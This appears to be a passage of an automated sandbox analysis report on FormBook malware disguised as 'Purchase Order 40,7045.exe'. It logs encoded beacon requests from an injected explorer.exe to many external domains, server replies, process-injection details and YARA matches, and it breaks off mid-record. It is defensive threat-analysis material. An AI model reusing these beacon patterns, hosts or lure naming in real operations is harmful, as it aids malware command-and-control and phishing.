13	192.168.2.3	49753	45.194.171.26	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:24:29.440793037 CET	4662	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHFEaROkrMNd5 HTTP/1.1 Host: www.chemtradent.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:24:29.849056959 CET	4662	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Sat, 21 Nov 2020 08:24:29 GMT Content-Type: text/html; charset=gbk Transfer-Encoding: chunked Connection: close Location: /404.html Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49755	74.208.236.115	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:24:40.429598093 CET	4664	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA HTTP/1.1 Host: www.ownumo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:24:40.573529005 CET	4666	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1364 Connection: close Date: Sat, 21 Nov 2020 08:24:40 GMT Server: Apache X-Frame-Options: deny Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"></div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.loc
Nov 21, 2020 09:24:40.573551893 CET	4666	IN	Data Raw: 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 53 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ation.host + '/' + 'IONOSParkingUS' + '/park.js">' + '<\/script>' ); </script> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49730	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:24.911351919 CET	268	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=EbC/lMdsFrxYIRmxU9JVdurtFZV4D4JG65XX9u0TQDrH/vXXo4aXqz2TK/FSo60698x+ HTTP/1.1 Host: www.coveloungewineandwhiskey.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:23:25.026355028 CET	269	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sat, 21 Nov 2020 08:23:24 GMT Content-Type: text/html Content-Length: 275 ETag: "5fb7c734-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49736	208.91.197.160	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:30.342092037 CET	341	OUT	GET /igqu/?JBZ0nHS=cBWwxeNBZw14c0R1jn0Ws/yQjDXlXErbhexqVqcZJ/j9HX594bSs/9hubjzw4SjFPh4C&BZ=E2J8Yj-0_Jl HTTP/1.1 Host: www.covid19salivatestdirect.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:23:30.514624119 CET	342	IN	HTTP/1.1 200 OK Date: Sat, 21 Nov 2020 08:23:30 GMT Server: Apache Set-Cookie: vsid=925vr3534926104426681; expires=Thu, 20-Nov-2025 08:23:30 GMT; Max-Age=157680000; path=/; domain=www.covid19salivatestdirect.com; HttpOnly Content-Length: 272 Keep-Alive: timeout=5, max=25 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 20 28 32 35 29 3c 2f 68 33 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (25)</h3></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49742	160.153.136.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:35.598393917 CET	4628	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4hm34ORqosTB HTTP/1.1 Host: www.heartandcrowncloset.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:23:35.624041080 CET	4628	IN	HTTP/1.1 302 Found Connection: close Pragma: no-cache cache-control: no-cache Location: /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4hm34ORqosTB

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49743	168.206.180.179	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:41.173491001 CET	4629	OUT	GET /igqu/?JBZ0nHS=gtAjDyhewVv0wP+pLldDDzZVOHZuvXFhM8dcKQ7x+XbEhwRlJbrCtCBURlOjpb7ofbaF&BZ=E2J8Yj-0_Jl HTTP/1.1 Host: www.primeworldgroup.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49744	3.138.72.189	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:46.681252956 CET	4630	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MP3xgLgHQaOW HTTP/1.1 Host: www.placeduconfort.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:23:46.794529915 CET	4630	IN	HTTP/1.1 404 Not Found Date: Sat, 21 Nov 2020 08:23:46 GMT Content-Type: text/html Content-Length: 153 Connection: close Server: nginx/1.16.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49745	119.81.172.165	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:52.176956892 CET	4631	OUT	GET /igqu/?JBZ0nHS=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47oBU/CZqG/X0&BZ=E2J8Yj-0_Jl HTTP/1.1 Host: www.hyx20140813.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49746	35.246.6.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:23:57.488390923 CET	4632	OUT	GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=+vzchlDpP8hhVSy3W5GjgGJ1ZPT8aqTFt8VTi3L78WqIr+4DtdDaKL74hph6Iza73r7P HTTP/1.1 Host: www.obsessingwealth.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:23:57.585954905 CET	4633	IN	HTTP/1.1 404 Not Found Date: Sat, 21 Nov 2020 08:23:57 GMT Content-Type: text/html;charset=utf-8 Content-Length: 2963 Connection: close cache-control: no-cache content-language: en x-wix-request-id: 1605947037.512617447223123744 vary: Accept-Encoding Age: 0 X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVibIocjnRtufUcpNBchey7f,2d58ifebGbosy5xc+FRaloPX4ngKfQM8fEHbwELHijnY7/VNlubeTQ0QDVGgdWZOWIHlCalF7YnfvOr2cMPpyw==,Nlv1KFVtIvAfa3AK9dRsIypLE4F2PuIWPzRaGkCubY4fbJaKSXYQ/lskq2jK6SGP,2UNV7KOq4oGjA5+PKsX47LZ7Kls+1whC/C/a0aUIqJE=,qquldgcFrj2n046g4RNSVOgjK1IbQcmp+2yVeKIZh3A=,Ts+7R/4FijtA6c9psi3FQOPGhVfh+x6EeEw93/iu2TqTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,9n3wTMzaU7zAZzBAj7gVU1qo4CFM+qXpuugP2vtnPwCK+afZ0G9g+n2YylymUGNgVnd8Z4jLK9R467MyhrzM6w==,Ts+7R/4FijtA6c9psi3FQOPGhVfh+x6EeEw93/iu2TqTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,l7Ey5khejq81S7sxGe5Nk93BmJcRyJ7RcvYfTdrJez2TzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,a3Wp9ZyujRzrXdcjNnttJp5sroSNvmr+Pl/L0Ukl0K5w1Vz15De+ZI5GVU3WIK+CJoSwYn8c4giImF/hgqmpqg== Server: Pepyaka/1.19.0 Data Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title n
Nov 21, 2020 09:23:57.586019993 CET	4635	IN	Data Raw: 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a Data Ascii: g-bind="'page_title' \| translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.c
Nov 21, 2020 09:23:57.586061954 CET	4636	IN	Data Raw: 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a Data Ascii: services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.299.0/scripts/error-pages/locale/messages_en.js"></script> ... --><script src="//static.parastor
Nov 21, 2020 09:23:57.586092949 CET	4636	IN	Data Raw: 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49748	54.208.77.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2020 09:24:02.764219999 CET	4645	OUT	GET /igqu/?JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl HTTP/1.1 Host: www.cashintl.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2020 09:24:02.868865013 CET	4646	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=utf-8 Date: Sat, 21 Nov 2020 08:24:02 GMT Location: https://www.afternic.com/forsale/cashintl.com?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_campaign=TDFS_DASLNC&traffic_type=TDFS_DASLNC&traffic_id=daslnc&JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl Server: nginx/1.16.1 Content-Length: 293 Connection: Close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 66 74 65 72 6e 69 63 2e 63 6f 6d 2f 66 6f 72 73 61 6c 65 2f 63 61 73 68 69 6e 74 6c 2e 63 6f 6d 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 44 41 53 4c 4e 43 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 74 72 61 66 66 69 63 5f 74 79 70 65 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 74 72 61 66 66 69 63 5f 69 64 3d 64 61 73 6c 6e 63 26 61 6d 70 3b 4a 42 5a 30 6e 48 53 3d 50 57 70 4a 59 67 73 59 39 4c 6b 36 44 52 77 50 49 58 38 63 76 36 4b 68 58 6d 79 62 44 46 50 59 34 4d 55 36 39 68 6e 63 71 6e 73 51 78 44 74 7a 79 32 63 79 33 52 2f 58 63 34 4e 2b 4f 55 38 34 45 2f 39 7a 26 61 6d 70 3b 42 5a 3d 45 32 4a 38 59 6a 2d 30 5f 4a 6c 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://www.afternic.com/forsale/cashintl.com?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_campaign=TDFS_DASLNC&traffic_type=TDFS_DASLNC&traffic_id=daslnc&JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl">Found</a>.

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Purchase Order 40,7045.exe PID: 6916 Parent PID: 5644

General

Start time:	09:22:28
Start date:	21/11/2020
Path:	C:\Users\user\Desktop\Purchase Order 40,7045.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Purchase Order 40,7045.exe'
Imagebase:	0x7ffb73670000
File size:	347136 bytes
MD5 hash:	2566AAC2FAF57E27D8778F2C61BAC6D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: Purchase Order 40,7045.exe PID: 6932 Parent PID: 6916

General

Start time:	09:22:29
Start date:	21/11/2020
Path:	C:\Users\user\Desktop\Purchase Order 40,7045.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Purchase Order 40,7045.exe
Imagebase:	0x7ffb73670000
File size:	347136 bytes
MD5 hash:	2566AAC2FAF57E27D8778F2C61BAC6D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 6932

General

Start time:	09:22:33
Start date:	21/11/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: netsh.exe PID: 6984 Parent PID: 3388

General

Start time:	09:22:40
Start date:	21/11/2020
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\netsh.exe
Imagebase:	0xd90000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 